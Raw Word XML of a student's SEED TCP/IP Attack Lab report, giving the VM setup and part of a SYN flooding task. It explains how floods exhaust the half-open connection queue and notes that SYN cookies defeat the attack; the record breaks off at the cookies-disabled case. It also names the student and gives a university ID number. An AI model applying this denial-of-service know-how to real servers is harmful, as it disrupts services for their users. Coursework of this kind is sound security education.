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2DF23B" w14:textId="77777777" w:rsidR="00055B14" w:rsidRDefault="006D06A3" w:rsidP="006D06A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>TCP/IP Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B2A89D" w14:textId="77777777" w:rsidR="006D06A3" w:rsidRDefault="006D06A3" w:rsidP="006D06A3">
      <w:r>
        <w:t>NAME: JASHWANTH REDDY GANGULA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFB4715" w14:textId="77777777" w:rsidR="006D06A3" w:rsidRDefault="006D06A3" w:rsidP="006D06A3">
      <w:r>
        <w:t>SUID: 646254141</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE2C55F" w14:textId="77777777" w:rsidR="006D06A3" w:rsidRDefault="006D06A3" w:rsidP="006D06A3"/>
    <w:p w14:paraId="090C7E49" w14:textId="77777777" w:rsidR="00210CC2" w:rsidRPr="000C1008" w:rsidRDefault="00210CC2" w:rsidP="00210CC2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C1008">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>2.1 Environment Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2D2B0" w14:textId="77777777" w:rsidR="006A539D" w:rsidRDefault="006A539D" w:rsidP="006D06A3"/>
    <w:p w14:paraId="794978D5" w14:textId="18453EAB" w:rsidR="006A539D" w:rsidRDefault="006A539D" w:rsidP="006D06A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3381D4CD" wp14:editId="68FAE200">
            <wp:extent cx="4700016"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png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId4">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4700016" cy="3657600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBCF69C" w14:textId="580EA230" w:rsidR="006A539D" w:rsidRDefault="00366DDB" w:rsidP="006D06A3">
      <w:r>
        <w:t xml:space="preserve">The figure above is taken from the lab and IP addresses are modified according to the setup on my </w:t>
      </w:r>
      <w:r w:rsidR="00BF3A35">
        <w:t>system. Here</w:t>
      </w:r>
      <w:r w:rsidR="006A539D">
        <w:t xml:space="preserve"> we assume Machine 1 is the </w:t>
      </w:r>
      <w:r w:rsidR="00A8467B">
        <w:t>client,</w:t>
      </w:r>
      <w:r w:rsidR="006A539D">
        <w:t xml:space="preserve"> Machine 2 as the server, Machine 3 as the </w:t>
      </w:r>
      <w:r w:rsidR="00A8467B">
        <w:t>observer (</w:t>
      </w:r>
      <w:r w:rsidR="006A539D">
        <w:t>which will perform attacks</w:t>
      </w:r>
      <w:r w:rsidR="00803F73">
        <w:t>). All</w:t>
      </w:r>
      <w:r w:rsidR="006A539D">
        <w:t xml:space="preserve"> the machines are connected to NAT network with CIDR- 10.0.2.0/24</w:t>
      </w:r>
      <w:r w:rsidR="00AE741C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="006A539D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D3C9A">
        <w:t xml:space="preserve">NAT supports DHCP and hence VMs are connected to Internet. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F6CDF9" w14:textId="77777777" w:rsidR="00573015" w:rsidRDefault="00573015" w:rsidP="006D06A3"/>
    <w:p w14:paraId="3361C708" w14:textId="31E4A5FB" w:rsidR="009D3F3A" w:rsidRDefault="006D77FF" w:rsidP="006D06A3">
      <w:r>
        <w:t xml:space="preserve">Netwox Tools: We use this tool to send network packets of different types with different contents. </w:t>
      </w:r>
      <w:r w:rsidR="00BC7791">
        <w:t xml:space="preserve">We can use “netwox number --help” to know the </w:t>
      </w:r>
      <w:r w:rsidR="009D3F3A">
        <w:t>parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523FE1A3" w14:textId="5EE40AD7" w:rsidR="009D3F3A" w:rsidRDefault="009D3F3A" w:rsidP="006D06A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D80C327" wp14:editId="2961FF56">
            <wp:extent cx="5943600" cy="2948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SEED-UBUNTU_26_02_2018_22_19_12.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p>
    <w:p w14:paraId="3F556952" w14:textId="77777777" w:rsidR="00210CC2" w:rsidRDefault="00210CC2" w:rsidP="006D06A3"/>
    <w:p w14:paraId="0872AD88" w14:textId="77777777" w:rsidR="009D3F3A" w:rsidRPr="009D3F3A" w:rsidRDefault="009D3F3A" w:rsidP="009D3F3A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D3F3A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Enabling the ftp and telnet Servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E68576" w14:textId="244D0940" w:rsidR="009D3F3A" w:rsidRDefault="00B13E95" w:rsidP="006D06A3">
      <w:r>
        <w:t>We enable them using the commands given in the lab</w:t>
      </w:r>
      <w:r w:rsidR="000A765F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00B9774D">
        <w:t>(Telnet runs on port 23)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB9114D" w14:textId="7868D6D0" w:rsidR="000A765F" w:rsidRDefault="000A765F" w:rsidP="006D06A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6905EDCF" wp14:editId="3C3B0555">
            <wp:extent cx="5943600" cy="2847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SEED-UBUNTU_26_02_2018_22_24_54.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585268EB" w14:textId="66DA124D" w:rsidR="00261156" w:rsidRDefault="007E5862" w:rsidP="006D06A3">
      <w:r>
        <w:t>Now check the status of these commands using “service vsftpd status” and “service openbsd-inetd status”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A96D21" w14:textId="232C8C06" w:rsidR="00CA4439" w:rsidRDefault="00CA4439" w:rsidP="006D06A3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F049738" wp14:editId="6C38E289">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SEED-UBUNTU Clone_26_02_2018_23_12_00.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6428EA" w14:textId="77777777" w:rsidR="007E5862" w:rsidRDefault="007E5862" w:rsidP="006D06A3"/>
    <w:p w14:paraId="49FD8924" w14:textId="77777777" w:rsidR="007E5862" w:rsidRDefault="007E5862" w:rsidP="00364300">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10984864" w14:textId="7E8D5B68" w:rsidR="00364300" w:rsidRPr="001250DA" w:rsidRDefault="00364300" w:rsidP="00364300">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001250DA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Task </w:t>
      </w:r>
      <w:r w:rsidR="00E642E1" w:rsidRPr="001250DA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r w:rsidRPr="001250DA">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN Flooding Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B21AFFA" w14:textId="42278E64" w:rsidR="006C0BE3" w:rsidRDefault="006C0BE3" w:rsidP="006C0BE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C0BE3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">To simplify the </w:t>
      </w:r>
      <w:r w:rsidR="00DA04DA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006C0BE3">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">guess” of TCP sequence numbers and source port numbers, we assume that attackers </w:t>
      </w:r>
      <w:r w:rsidRPr="006C0BE3">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>are on the same physical network as the victims. Therefore, you can use sniffer tools to get that information. The following is the list of attacks that need to be implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76BE0A5A" w14:textId="77777777" w:rsidR="00407663" w:rsidRDefault="00407663" w:rsidP="006C0BE3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F55DF71" w14:textId="5EDAAB4F" w:rsidR="00407663" w:rsidRDefault="00407663" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00407663">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SYN flood is a form of DoS attack in which attackers send many SYN requests to a victim</w:t>
      </w:r>
      <w:r w:rsidRPr="00407663">
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica" w:cs="Helvetica"/>
        </w:rPr>
        <w:t>’s TCP port, but the attackers have no intention to finish the 3-way handshake procedure. Attackers either use spoofed IP address or do not continue the procedure. Through this attack, attackers can flood the victim’s queue that is used for half-o</w:t>
      </w:r>
      <w:r w:rsidRPr="00407663">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pened connections, i.e. the connections that has finished SYN, SYN-ACK, but has not yet gotten a final ACK back. When this queue is full, the victim cannot take any more connection</w:t>
      </w:r>
      <w:r w:rsidR="0065140C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E289177" w14:textId="77777777" w:rsidR="003738AD" w:rsidRDefault="003738AD" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7561728C" w14:textId="0E283895" w:rsidR="003738AD" w:rsidRDefault="003738AD" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We can check the size of this queue using the command “sysctl </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">q </w:t>
      </w:r>
      <w:r w:rsidRPr="003738AD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>net.ipv4.tcp_max_syn_backlog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="001D6E66">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. This is the maximum number of outstanding SYNC requests allowed on the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A412322" w14:textId="77777777" w:rsidR="00063105" w:rsidRDefault="00063105" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2290B79C" w14:textId="4C6F99C0" w:rsidR="00EE00E3" w:rsidRDefault="00081F2E" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="706A2DD8" wp14:editId="614912A7">
            <wp:extent cx="5943600" cy="3545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D-UBUNTU_26_02_2018_23_01_05.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4A193BB8" w14:textId="77777777" w:rsidR="009E381C" w:rsidRDefault="009E381C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096746E9" w14:textId="76121355" w:rsidR="009E381C" w:rsidRDefault="00D078C8" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Use t</w:t>
      </w:r>
      <w:r w:rsidR="009E381C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">he command </w:t>
      </w:r>
      <w:r w:rsidR="009E381C">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
        </w:rPr>
        <w:t>“netstat -na” to check the status of all the connections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A180586" w14:textId="11958DD7" w:rsidR="009E381C" w:rsidRDefault="009E381C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="316F1E5D" wp14:editId="11C1D660">
            <wp:extent cx="5943600" cy="3431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SEED-UBUNTU_26_02_2018_23_07_08.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5449E9DB" w14:textId="2B461A0C" w:rsidR="009E381C" w:rsidRDefault="00D078C8" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">(The output </w:t>
      </w:r>
      <w:r w:rsidR="00F32A1C">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">of the above image </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>couldn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
        </w:rPr>
        <w:t>’t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> fit in a single page)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6272F648" w14:textId="77777777" w:rsidR="0052679E" w:rsidRDefault="0052679E" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F5F20B7" w14:textId="77777777" w:rsidR="0052679E" w:rsidRDefault="0052679E" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D08B110" w14:textId="77777777" w:rsidR="009E381C" w:rsidRDefault="009E381C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B9C5514" w14:textId="77777777" w:rsidR="009E381C" w:rsidRPr="003738AD" w:rsidRDefault="009E381C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5346D15C" w14:textId="4E612471" w:rsidR="0065140C" w:rsidRDefault="00785691" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Before the Attack</w:t>
      </w:r>
      <w:r w:rsidR="002D3906">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> telnet </w:t>
      </w:r>
      <w:r w:rsidR="00031882">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="001B1680">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>successful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:r w:rsidR="001B1680">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>client (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">10.0.2.6) to </w:t>
      </w:r>
      <w:r w:rsidR="001B1680">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>server (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>10.0.2.5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4F8E04" w14:textId="77777777" w:rsidR="00785691" w:rsidRDefault="00785691" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D07FA28" w14:textId="01ADCE6C" w:rsidR="00785691" w:rsidRDefault="00785691" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1265A9DA" wp14:editId="771BD456">
            <wp:extent cx="5943600" cy="2184400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="6" name="Picture 6" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%205.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s/Screen%20Shot%202018-02-27%20at%205.16.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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3F1681" w14:textId="77777777" w:rsidR="00785691" w:rsidRDefault="00785691" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7436ADEE" w14:textId="7CF2D401" w:rsidR="00FE104C" w:rsidRDefault="00FE104C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Size = 128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D3FBB" w14:textId="0ABC19DC" w:rsidR="00FE104C" w:rsidRDefault="00FE104C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SYN_COOKIE Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BB72BA" w14:textId="77777777" w:rsidR="00FE104C" w:rsidRDefault="00FE104C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9CFB63" w14:textId="100D95C0" w:rsidR="0098121B" w:rsidRDefault="00FE104C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4096EDB0" wp14:editId="13C5384D">
            <wp:extent cx="5930900" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="7" name="Picture 7" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%205.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s/Screen%20Shot%202018-02-27%20at%205.18.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1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D38CB2F" w14:textId="77777777" w:rsidR="00FE104C" w:rsidRDefault="00FE104C" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36D7C81B" w14:textId="7F2DDB93" w:rsidR="00FE104C" w:rsidRDefault="00A3789B" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">When the cookie is enabled SYN flooding is </w:t>
      </w:r>
      <w:r w:rsidR="00195F62">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">not </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>successful. As shown below.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F247B5E" w14:textId="310D4AAA" w:rsidR="00FE104C" w:rsidRDefault="00A3789B" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F297EB" wp14:editId="6FEB4D9C">
            <wp:extent cx="5930900" cy="3797300"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="12" name="Picture 12" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%205.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s/Screen%20Shot%202018-02-27%20at%205.20.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797300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F6324C" w14:textId="77777777" w:rsidR="00A3789B" w:rsidRDefault="00A3789B" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F485F2" w14:textId="6205DB47" w:rsidR="00A3789B" w:rsidRDefault="00EA7870" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see a lot of SYN packets from random IP addresses and SYN+ACK packets from </w:t>
      </w:r>
      <w:r w:rsidR="00570EC5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">server to those random addresses. </w:t>
      </w:r>
      <w:r w:rsidR="00EC2274">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">So a lot of half open connections are maintained by the server expecting ACK from those random addresses. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC363D1" w14:textId="5E1323A8" w:rsidR="00A3789B" w:rsidRDefault="00A3789B" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21E19B60" wp14:editId="20EA783B">
            <wp:extent cx="5930900" cy="3619500"/>
            <wp:effectExtent l="0" t="0" r="12700" b="12700"/>
            <wp:docPr id="14" name="Picture 14" descr="../../../../../../../Downloads/Screenshots/Screen%20Shot%202018-02-27%20at%205.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s/Screen%20Shot%202018-02-27%20at%205.21.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3619500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A12FFDA" w14:textId="77777777" w:rsidR="00A3789B" w:rsidRDefault="00A3789B" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="772A8C91" w14:textId="77777777" w:rsidR="00A3789B" w:rsidRDefault="00A3789B" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365F845F" w14:textId="7C087E80" w:rsidR="00A3789B" w:rsidRDefault="00031882" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>With SYN COOKIE Dis</w:t>
      </w:r>
      <w:r w:rsidR="00A3789B">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>abled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484034FD" w14:textId="0BDC324A" w:rsidR="00161520" w:rsidRDefault="00A3789B" w:rsidP="00407663">
      <w:pPr>
        <w:rPr>
